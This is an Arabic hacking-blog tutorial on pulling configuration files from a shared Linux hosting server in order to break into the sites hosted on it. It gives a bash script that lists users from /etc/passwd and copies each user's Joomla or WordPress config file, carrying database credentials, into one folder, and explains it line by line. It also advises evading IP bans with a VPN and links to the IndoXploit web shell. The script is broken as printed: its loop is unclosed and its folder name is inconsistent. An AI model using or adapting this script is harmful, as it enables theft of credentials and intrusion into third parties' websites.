شرح سحب الكونفيق من السيرفر و اختراق المواقع التي على السيرفر

شرح سحب الكونفيق من السيرفر و اختراق المواقع التي على السيرفر




    السلام عليكم و رحمة الله و بركاته


    موضوعنا اليوم غريب قليلا و لكن ساعطي مفهوم او كيف تتم عملية سحب الكونفيق من السيرفر
    للاسف الشديد نرى الكثير من الاطفال يقوم ب تحميل سكربت سحب الكونفيق و ادا لم ينجح معه الامر  يروح يحمل غيره و هو لا يعرف حتى كيف تتم عملية سحب الكونفيق
    لهادا انا هنا اليوم
    سوف نقوم ب الشرح ب الطريقة العملية لكي يفهم الجميع
    جميل جدا
    هادا سكربت بسيط جدا ب لغة الباش لسحب الكونفيق

    
    #!/bin/bash
    
    awk -F':' '{ print $1 }' /etc/passwd  > passwd.txt
    passwd=`cat passwd.txt`
    mkdir sym_confog
    pwd=`pwd`
    wait
    for i in $passwd
    do
    
    cp /home/$i/public_html/configuration.*  $pwd/sym_confog/$i.txt
    
    



    دعونا نقوم ب شرح طبيعة عمل السكربت لازم ترجع الى اسسيات الباش لكي تفهم
    او تقوم ب كتابة السكربت ب لغة البرمجة التي تعرفها
    جميل جدا

    awk -F':' '{ print $1 }' /etc/passwd > passwd.txt
    1 امر سحب الباصوردات من السيرفر و و ضعها في ملف اسمه passwd.txt
    passwd=`cat passwd.txt`

    2 متغير اسمه passwd يحمل في داخله قيمة هده القيمة عبارة عن passwd الموجودة في السيرفر نفسه و التي سحبناها

    mkdir sym_config

    3 انشاء ملف اسمه sym_config طبعا لو تلاحضو السكرت موجه الى سيرفرات لينوكس فقط ف :)


    pwd=`pwd`

    4 حجز متغير يحمل في داخله امر pwd و هادا الامر وضيفته في اوامر الينكس هو تحديد مسار معين في السيرفر على سبيل المثال

    ملف موجود في home/user/Desktop/file
    لان نكتب في الترمنا pwd file سوف يطبع لنا home/user/Desktop/
    جميل جدا اضن ان الفكرة قد وصلت

    wait
    for i in $passwd
    do

    هنا نريد انشاء عملة حسابية في الاسفل فقلنا ادا i in $passwd و الان ننزل الى الاسفل لعمل العملية الحسابية الخاصة بنا و هي سحب الكونفيق

    cp /home/$i/public_html/configuration.* $pwd/sym_confog/$i.txt

    هنا قلنا cp اي نسخ مسار /home/$i/public_html/configuration.* الى $pwd/sym_confog/$i.txt جميل جدا اليس مفهوم حسننا سادخلها في راسك

    $i هو متغير يحمل قيمة و القيمة في حالتنا الان هي اليوزر

    configuration.* هادا هو اسم الكونفيق لو كان بدك تسحب ورد برس كل ما عليك فعله هو تغييره ليصبح wp-config.* جميل جدا

    pwd/sym_confog/$i.txt$

    هنا سوف ينشء ملف اسمه$i.txt يعني اليوزر + اسم ملف الكونفيق و لكن ب سيغة txt

    الان خلينا نضيف العديد من الاسماء و المسرات لانه و بطبيعة الحال يوجد الكثير من اليوزرات و الكونفقات في السيرفر
    لا تنسى تغيير /home/public_html/ بمسار السيرفر الدي تريد السحب منه غالبايكون home2 home4 او vhost جميل رح اعدل على السكربت

    النتيجة النهائية





    من الافضل انك تعيد كتابة السكربت بلغة php لانه سوف تحدث معك مشاكل على الاغلب في sh و لكن ادا تم حضر الايبي الخاص بك من السيرفر عند
    تجربة السكربت قم فقط ب عمل vpn و ان شاء الله ينفك الحضر
    الملخص
    انا لم اضف الكثير من المسارات
    /home1 و /home/ انت يمكنك اعدة كتابة السكربت و تطويره الى غاية سحب كل الكونفقات من السيرفر
    و هناك طرق اخرى ايضا قوية الا و هي عن طريق شل  IndoXploit لان اضافة سحب الكونفيق على هادا الشل اكثر من رائعة و تدعم معضم المسارات و انواع السكربتات المركبة على السيرفر 
    رابط تحميل الشل 
    http://www.tools-hack.com/2017/05/download-shell-indoxploit.html

    الشرح ب الفيديو 


    إرسال تعليق

    اعلان